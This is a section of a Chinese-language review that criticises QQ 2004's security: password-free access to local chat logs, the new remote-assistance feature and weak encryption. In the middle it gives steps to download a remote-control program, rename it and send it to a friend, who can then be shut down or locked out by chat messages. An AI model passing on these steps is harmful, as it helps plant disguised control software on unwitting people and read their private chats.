二、安全隐患是否考虑太少？

    长期以来，网络上流传着一个不需要知道密码也可以查看本地QQ好友列表和聊天纪录的软件——LookMess，它的原理是暂时修改存放在内存中的本地QQ密码，让你可以在离线情况下登录QQ。 与之原理类似的还可以使用UltraEdit对QQ文件进行修改来达到同样的目的。这一致命漏洞足以让所有QQ用户不寒而栗——不知道密码也可以登录，相当于任何人都可以对别人的QQ为所欲为。NinJai对这一漏洞非常好奇，在对QQ 2004II beta1进行测试后，结果令人大失所望，该漏洞依然是雷打不动的存在！

    无独有偶，新版QQ中又加入了“远程协助”这个被称为“潜在危机”的新功能，它是否会引起针对QQ的新一轮攻击，目前还尚未得知。不过联想到之前出现的那段“针对QQ远程控制入侵”代码和早些时候流行的riched20.dll缓冲区溢出漏洞”，这不得不让我们为QQ的安全性捏上一把汗。如果你认为我是在危言耸听，那我们就一起来做一个简单的实验。

    首先从https://mlog.cn/resserver.php?blogId=233&resource=QQrwx.rar下载名为QQrwx的压缩文件，将其解压并修改其中的QQrwx.exe文件为任意名字，将该压缩包发送给你的QQ好友。一旦他/她运行该文件后，你可以打开和他/她的聊天窗口（注意使用消息模式，而非聊天模式，否则无效），发送类似一段“老兄，我想要你关闭电脑，ok？”（其他文字也可，只要含有“关闭电脑”四个字就行了），对方的电脑便自动关闭！不光如此，你也可以通过不同的控制代码来实现对对方电脑的不同操作，如打开对方的“我的电脑”、锁定对方的鼠标、注销用户甚至排列对方的桌面图标等等。这是一款共享软件，作者在帮助文件中还提到“如果想发送的控制语句人性化，如：发送‘你吃了吗？’，电脑就重新启动，请与作者联系……”

    怎么样？QQ是不是比你想像中还要脆弱？其实同样的情况还存在于QQ网络备忘录和Tecent Traveler浏览器的自动填表功能当中，简单加密机制，甚至毫无加密措施让对安全性要求稍微高些的用户忘而却步。在QQ 2004正式版中推出的“对讲机”功能也是埋藏在QQ中的一枚“不定时炸弹”，使用它产生的聊天纪录被存放在QQ安装目录号码文件下的PttFile目录中。而网络硬盘没有提供额外的加密措施也是QQ安全性为人诟病之处。